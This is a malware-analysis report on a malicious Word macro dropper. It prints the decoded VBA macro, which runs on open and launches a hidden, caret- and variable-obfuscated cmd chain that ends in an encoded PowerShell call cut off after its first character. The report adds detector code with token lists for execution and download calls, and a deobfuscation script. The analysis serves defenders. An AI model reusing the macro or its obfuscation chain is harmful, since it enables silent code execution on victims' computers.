Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d9dafbfdc72a9c2a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 100.0 KB
Created: 2018-06-06 22:09:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 83cc80ce024cb042cc9d3f509e256955
SHA-1: 41d47511c578be348493646028a134f0d4d98af9
SHA-256: d9dafbfdc72a9c2a3a7249878c95bf27608ab2ecb13ec5fab9a9daec34c424c5
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Word document (OLE container) carrying VBA macros. A Sub named Autoopen runs automatically when the document is opened and calls NOunDqfsJA(), which passes a string concatenated from many short literals to Shell() with a window-style argument written as 1018 - 1018, i.e. 0 (vbHide), so the document is built to execute an arbitrary command silently on open; the arithmetic assignments interleaved with the string lines are padding that nothing ever reads. The ClamAV detection Doc.Dropper.Agent-6575835-0 further supports classifying it as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6575835-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6575835-0
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The VBA code calls Shell(), which starts an external program. In this sample the window-style argument is 1018 - 1018 = 0 (vbHide), so the launched process runs without a visible window.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    A Sub named Autoopen is present. Word runs it automatically when the document is opened, and here it calls the Shell() wrapper NOunDqfsJA().
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (see Extracted artifacts below), so this marker duplicates the AutoOpen finding rather than adding independent evidence.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace that ordinary Office documents embed; it is not a network indicator for this sample.
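How the source-level heuristics (OLE_VBA_AUTOOPEN, OLE_VBA_SHELL) and the p-code fallback (OLE_VBA_PCODE_AUTOEXEC_EXEC) above can be implemented, as an added example that is not the analysis platform's own detector code. The token lists and the sample inputs are constructed for the example; the rule codes and severities mirror the report. The source scanner blanks out string literals and comments before matching so a benign macro that merely mentions Shell does not fire, and the raw-stream scanner only fires on the conjunction of an auto-exec identifier and an execution identifier, as the report's description of that rule requires.

```python
import re

# Token lists are assumptions for this example: the report names AutoOpen and
# Shell() explicitly; the rest are common VBA entry points and execution,
# download and object-creation calls.
AUTOEXEC_NAMES = ("AutoOpen", "Auto_Open", "AutoExec", "AutoClose", "AutoNew",
                  "Document_Open", "Document_Close", "Workbook_Open", "Workbook_Activate")
EXEC_TOKENS = ("Shell", "WScript.Shell", "CreateObject", "GetObject", "ShellExecute",
               "URLDownloadToFile", "XMLHTTP", "ADODB.Stream", "Run", "Exec")
# Rule codes and severities as used in the report above.
SEVERITY = {
    "OLE_VBA_MACROS": "medium",
    "OLE_VBA_AUTOOPEN": "high",
    "OLE_VBA_SHELL": "critical",
    "OLE_VBA_PCODE_AUTOEXEC_EXEC": "high",
}


def _code_only(line):
    """Blank out "..." literals and drop trailing ' comments so tokens inside
    them do not fire (a benign macro may mention Shell in a message string)."""
    return re.sub(r'"[^"]*"', '""', line).split("'", 1)[0]


def scan_vba_source(src):
    """Source-level heuristics over decoded VBA. Returns {rule_code: severity}."""
    findings = {}
    if src.strip():
        findings["OLE_VBA_MACROS"] = SEVERITY["OLE_VBA_MACROS"]
    code = "\n".join(_code_only(l) for l in src.splitlines())
    # A procedure whose name is an auto-exec entry point; VBA names are case-insensitive.
    auto = "|".join(AUTOEXEC_NAMES)
    if re.search(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(?:' + auto + r')\b',
                 code, re.I | re.M):
        findings["OLE_VBA_AUTOOPEN"] = SEVERITY["OLE_VBA_AUTOOPEN"]
    # Shell used as a call, outside strings and comments.
    if re.search(r'\bShell\s*\(', code, re.I):
        findings["OLE_VBA_SHELL"] = SEVERITY["OLE_VBA_SHELL"]
    return findings


def scan_raw_stream(blob):
    """Fallback when no source decodes: identifiers still survive as ASCII in the
    module/cache streams, so look for them in the raw bytes and fire only on the
    conjunction of an auto-exec token and an execution token, which keeps a
    stream that merely contains 'AutoOpen' quiet."""
    text = blob.decode("latin-1")

    def word(tok):
        return re.search(r'(?<![A-Za-z0-9_])' + re.escape(tok) + r'(?![A-Za-z0-9_])',
                         text, re.I)

    if any(word(n) for n in AUTOEXEC_NAMES) and any(word(t) for t in EXEC_TOKENS):
        return {"OLE_VBA_PCODE_AUTOEXEC_EXEC": SEVERITY["OLE_VBA_PCODE_AUTOEXEC_EXEC"]}
    return {}


# Constructed samples (not from the report): a benign macro, a trimmed copy of
# the extracted macro's control flow, and a fake raw stream holding only
# identifier strings between binary bytes.
BENIGN = '''Sub FormatTable()
    ' the word Shell( appears only in this comment and in a string
    MsgBox "Run Shell() later"
End Sub
'''
DROPPER = '''Function NOunDqfsJA()
On Error Resume Next
NOunDqfsJA = QIcFhYSqw + Shell(IZsERWSs + VDwCbH, 1018 - 1018)
End Function
Sub Autoopen()
On Error Resume Next
NOunDqfsJA
End Sub
'''
RAW_STREAM = b"\x00\x03\x12AutoOpen\x00\x00\x07NOunDqfsJA\x00\x05Shell\x00" + b"\xff" * 8

if __name__ == "__main__":
    for label, result in (("benign", scan_vba_source(BENIGN)),
                          ("dropper", scan_vba_source(DROPPER)),
                          ("raw stream", scan_raw_stream(RAW_STREAM))):
        print(label, result)
```

Running the script reports only OLE_VBA_MACROS for the benign macro, all three source rules for the dropper-shaped macro, and the p-code rule for the raw stream; a stream containing AutoOpen but no execution token yields nothing.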

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13304 bytes
SHA-256: fe37a780be9644e6d97de5b037382f87e6059bc84c6b197647c6e9db19adc7b7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "JkEQPihD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NOunDqfsJA()
On Error Resume Next
fuJLEt = CStr(lBiwT * Tan(czHOvX * Int(jZfOj * Sqr(59015) / cdQiF + Fix(47782)) / 31955 * Round(2043 / Log(39310 - KFzwNG) + 78876 - jGswNQ)) / 29721 + CByte(9212))
wFOufZ = CStr(kIlAs * Tan(QbdPEq * Int(GVTqQ * Sqr(92893) / idQAS + Fix(896)) / 55755 * Round(35159 / Log(90683 - zifdO) + 10570 - oFopR)) / 42085 + CByte(95612))
NOunDqfsJA = QIcFhYSqw + Shell(IZsERWSs + Chr(jnOXza + vbKeyC + mYzPqjz) + VDwCbH + tqwEiEHjK + wjwdpvTwjYS + jXQdKRGzsm + YcnwbtGZG + vaLkiKCOt, 1018 - 1018)
Zhpcm = CStr(ijArG * Tan(khsSzj * Int(RZKus * Sqr(31151) / CKHiNI + Fix(36024)) / 78460 * Round(87883 / Log(37381 - pIhSvi) + 73636 - NjGMW)) / 85058 + CByte(71986))
End Function
Sub Autoopen()
On Error Resume Next
flOmwM = CStr(VUbSiw * Tan(wnZiI * Int(pzifH * Sqr(70431) / Ovzkq + Fix(53171)) / 18113 * Round(74638 / Log(5917 - jqdTMw) + 38567 - IJonT)) / 76405 + CByte(85058))
NOunDqfsJA
NJjHjf = CStr(JaaWq * Tan(ComtIs * Int(iEdAKS * Sqr(99635) / NacKsG + Fix(26886)) / 354 * Round(11538 / Log(91575 - BiTtlc) + 56595 - FUCuKv)) / 8430 + CByte(9954))
End Sub


Attribute VB_Name = "jjzQflwz"
Function VDwCbH()
On Error Resume Next
mRZjf = CStr(uEMzAO * Tan(XwMTia * Int(hRUWlT * Sqr(70512) / sJvdOK + Fix(32352)) / 50413 * Round(94142 / Log(95439 - EiaLW) + 99206 - OkDPW)) / 67382 + CByte(10046))
FrYWUzj = "md ZwmpJQbMjtq" + "JT zEttfW" + "juKE" + "zILlFOLQ"
aVwDv = CStr(rILCE * Tan(zhGVP * Int(QVzHG * Sqr(96230) / RFAhc + Fix(75632)) / 23425 * Round(46205 / Log(83582 - vdtCGM) + 41697 - IScUh)) / 56593 + CByte(64881))
ujPZOHwnq = "r PQiz" + "LjDjbfA &   " + "  " + "%^c^o^m^" + "S^p" + "^E^c^%     " + "%^c^o^m^S^p^E^" + "c^% " + "    /V    "
ASjYS = CStr(wjdGr * Tan(iPszHw * Int(sWTKI * Sqr(56451) / zfuzXW + Fix(371)) / 55108 * Round(74959 / Log(88032 - SShiMZ) + 98767 - uftad)) / 23601 + CByte(70632))
MifXsziGAk = "     /c " + "  " + "        set " + "%zEHBXFwz"
pdjHa = CStr(ZQTmfj * Tan(aGcwK * Int(idOJuL * Sqr(76183) / NEFQln + Fix(8978)) / 21106 * Round(98390 / Log(12038 - OXtQLZ) + 88111 - ATZQc)) / 36425 + CByte(44854))
ZrmtMbKCfO = "HpCckJH%=aafft" + "bYi" + "o&&set" + " %Ncaas" + "Jirtvqd%=p&&se" + "t %zoHsCCVGF"
obTmw = CStr(MLLOVu * Tan(PPGWMw * Int(lNDkA * Sqr(90059) / OnoczO + Fix(62535)) / 31455 * Round(68899 / Log(60874 - pbLhE) + 93641 - zUkDS)) / 89231 + CByte(30029))
oTKZPvUS = "YI%=o" + "^w&" + "&set %KwUmjB" + "SiECEDkiJ%" + "=SjnM" + "oznD&&set %iz" + "kCpaLTE%=!%" + "NcaasJirt" + "vqd%!&&set %T"
VDwCbH = FrYWUzj + ujPZOHwnq + MifXsziGAk + ZrmtMbKCfO + oTKZPvUS
End Function
Function tqwEiEHjK()
On Error Resume Next
GVaYj = CStr(BAzYXl * Tan(fPzjb * Int(XVFDI * Sqr(12168) / AaBKUt + Fix(25696)) / 52634 * Round(15233 / Log(21250 - LwhnaN) + 18002 - LfTElX)) / 83503 + CByte(84692))
PKudZpjjPt = "cJwzGVf" + "ZMM" + "JiLb%=jzjHC" + "LprWTbsl&&se" + "t %QGfZhjcu%=e" + "^r&&s" + "et %fsDCGj" + "tBEJ%=!%zo"
BARSRD = CStr(bwmDdY * Tan(YEKUfU * Int(urubvA * Sqr(63267) / QmdBU + Fix(50651)) / 14345 * Round(86834 / Log(44554 - swMcbG) + 7732 - jvAbDM)) / 45437 + CByte(16481))
OwbVUJ = "HsCCVG" + "FYI" + "%!&&set " + "%OmRSqjR" + "hafE%=s&&set " + "%VAMIQSDsWizhZ" + "iX%=zhHHzc" + "qRfB&&set %K"
IXrWD = CStr(FizZb * Tan(WQLma * Int(XXRQnX * Sqr(14892) / lVojR + Fix(58143)) / 23841 * Round(38000 / Log(97970 - fXpsG) + 89477 - jckMfp)) / 78236 + CByte(56105))
vwIsFvzESDq = "amYdXV%" + "=he&&set %fHE" + "SSbCDRLO%=ll&&" + "!%izkCpaL" + "TE%!!%" + "fsDCGjtBEJ" + "%!!%QGfZhjcu"
zkorjU = CStr(mTktQ * Tan(zqCRp * Int(DwfRX * Sqr(79896) / uXEFj + Fix(145)) / 11844 * Round(83068 / Log(58170 - fHlLID) + 48655 - BKYft)) / 19575 + CByte(26266))
ilWfiwizNkZ = "%!!%OmRSqjRhafE" + "%!!%KamYdXV%!" + "!%fHESSbCDRLO%!" + "  -e K"
hZdUTR = CStr(cZriN * Tan(tKRTP * Int(KEvvt * Sqr(11240) / WiiPdt + Fix(84
... (truncated)
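The Shell() argument is built from the short literals in VDwCbH() and tqwEiEHjK(): IZsERWSs, jnOXza and mYzPqjz are never assigned (Empty, numeric 0) and vbKeyC is 67, so the string starts with Chr(67) = "C", followed by "md", junk tokens, an ampersand, two caret-obfuscated %comspec% references, and a /V /c chain of set statements that define variables whose names literally contain percent signs and then stitch their values together with delayed-expansion !name! references. The added example below (not part of the report or of the sample) evaluates the visible concatenations and emulates that cmd.exe layer. It assumes cmd.exe ends up executing the /V /c chain, and joins tqwEiEHjK's fragments in source order because that function's return statement lies past the point where the preview is truncated. The result spells powershell followed by -e, PowerShell's abbreviation of -EncodedCommand; the encoded payload is cut off after "K" on this page, so nothing beyond that can be recovered from the preview.

```python
import re

# String-building lines of VDwCbH() and tqwEiEHjK(), copied verbatim from the
# extracted macro above. The arithmetic padding assignments are omitted because
# nothing reads them. tqwEiEHjK's own return statement lies past the page's
# truncation point, so its fragments are joined below in source order (an
# assumption); the payload itself is cut off after "-e K".
VBA_FRAGMENT = r'''
FrYWUzj = "md ZwmpJQbMjtq" + "JT zEttfW" + "juKE" + "zILlFOLQ"
ujPZOHwnq = "r PQiz" + "LjDjbfA &   " + "  " + "%^c^o^m^" + "S^p" + "^E^c^%     " + "%^c^o^m^S^p^E^" + "c^% " + "    /V    "
MifXsziGAk = "     /c " + "  " + "        set " + "%zEHBXFwz"
ZrmtMbKCfO = "HpCckJH%=aafft" + "bYi" + "o&&set" + " %Ncaas" + "Jirtvqd%=p&&se" + "t %zoHsCCVGF"
oTKZPvUS = "YI%=o" + "^w&" + "&set %KwUmjB" + "SiECEDkiJ%" + "=SjnM" + "oznD&&set %iz" + "kCpaLTE%=!%" + "NcaasJirt" + "vqd%!&&set %T"
VDwCbH = FrYWUzj + ujPZOHwnq + MifXsziGAk + ZrmtMbKCfO + oTKZPvUS
PKudZpjjPt = "cJwzGVf" + "ZMM" + "JiLb%=jzjHC" + "LprWTbsl&&se" + "t %QGfZhjcu%=e" + "^r&&s" + "et %fsDCGj" + "tBEJ%=!%zo"
OwbVUJ = "HsCCVG" + "FYI" + "%!&&set " + "%OmRSqjR" + "hafE%=s&&set " + "%VAMIQSDsWizhZ" + "iX%=zhHHzc" + "qRfB&&set %K"
vwIsFvzESDq = "amYdXV%" + "=he&&set %fHE" + "SSbCDRLO%=ll&&" + "!%izkCpaL" + "TE%!!%" + "fsDCGjtBEJ" + "%!!%QGfZhjcu"
ilWfiwizNkZ = "%!!%OmRSqjRhafE" + "%!!%KamYdXV%!" + "!%fHESSbCDRLO%!" + "  -e K"
'''

_TOKEN = re.compile(r'^\s*(?:"([^"]*)"|(\w+))\s*$')


def eval_vba_strings(src):
    """Evaluate assignments of the form  name = "lit" + other + ...  in order.
    Unassigned identifiers evaluate to "" (VBA Empty). Lines that are not pure
    string concatenation (the CStr/Tan/Sqr padding) are skipped."""
    env = {}
    for line in src.splitlines():
        m = re.match(r'^\s*(\w+)\s*=\s*(.+?)\s*$', line)
        if not m:
            continue
        name, rhs = m.groups()
        parts = [_TOKEN.match(p) for p in rhs.split(' + ')]
        if not all(parts):
            continue
        env[name] = ''.join(p.group(1) if p.group(1) is not None else env.get(p.group(2), '')
                            for p in parts)
    return env


def strip_carets(s):
    """cmd.exe's escape character: ^x is read as the literal character x."""
    return re.sub(r'\^(.)', r'\1', s, flags=re.S)


def delayed_expand(s, env):
    """/V delayed expansion: !name! is replaced when the statement runs; an
    undefined name expands to nothing."""
    return re.sub(r'!([^!]+)!', lambda m: env.get(m.group(1), ''), s)


def emulate_cmd_chain(cmdline):
    """Emulate `cmd /V /c a&&b&&...`: each `set` updates a fresh environment and
    the last non-set statement, after expansion, is what would execute. %name%
    tokens are left as typed: none of them is a defined variable, so cmd's
    percent-expansion phase keeps them literal, which is exactly why
    `set %x%=v` defines a variable whose name is literally %x%."""
    text = strip_carets(cmdline)
    m = re.search(r'/V\s+/c\s+', text, re.I)   # assumes /V precedes /c, as here
    if not m:
        raise ValueError("no /V /c chain found")
    env, final = {}, None
    for stmt in text[m.end():].split('&&'):
        stmt = delayed_expand(stmt.strip(), env)
        s = re.match(r'set\s+([^=]+)=(.*)$', stmt, re.I)
        if s:
            env[s.group(1).strip()] = s.group(2)
        else:
            final = stmt
    return final, env


def deobfuscate():
    """Rebuild the visible part of the Shell() argument and run it through the
    cmd.exe emulation. Returns (shell_argument, final_command, variables)."""
    env = eval_vba_strings(VBA_FRAGMENT)
    # Shell() gets IZsERWSs + Chr(jnOXza + vbKeyC + mYzPqjz) + VDwCbH + tqwEiEHjK + ...
    # IZsERWSs, jnOXza, mYzPqjz are never assigned (Empty -> 0); vbKeyC = 67 -> "C".
    partial_tqw = ''.join(env[n] for n in ("PKudZpjjPt", "OwbVUJ", "vwIsFvzESDq", "ilWfiwizNkZ"))
    shell_arg = "C" + env["VDwCbH"] + partial_tqw
    final, cmd_env = emulate_cmd_chain(shell_arg)
    return shell_arg, final, cmd_env


if __name__ == "__main__":
    shell_arg, final, cmd_env = deobfuscate()
    print("Shell() argument:", shell_arg)
    print("variables defined by the chain:", len(cmd_env))
    print("command after delayed expansion:", final)
```

The final statement expands to powershell -e K, with the rest of the encoded command missing because the preview ends there; the twelve intermediate variables (aafftbYio, SjnMoznD, jzjHCLprWTbsl, ...) are decoys that nothing references. The same three-layer structure, VBA string concatenation, caret-escaped cmd text, and set/!var! indirection under /V, is what the OLE_VBA_SHELL finding and a hidden-window Shell() call should prompt an analyst to unpick before the encoded PowerShell stage.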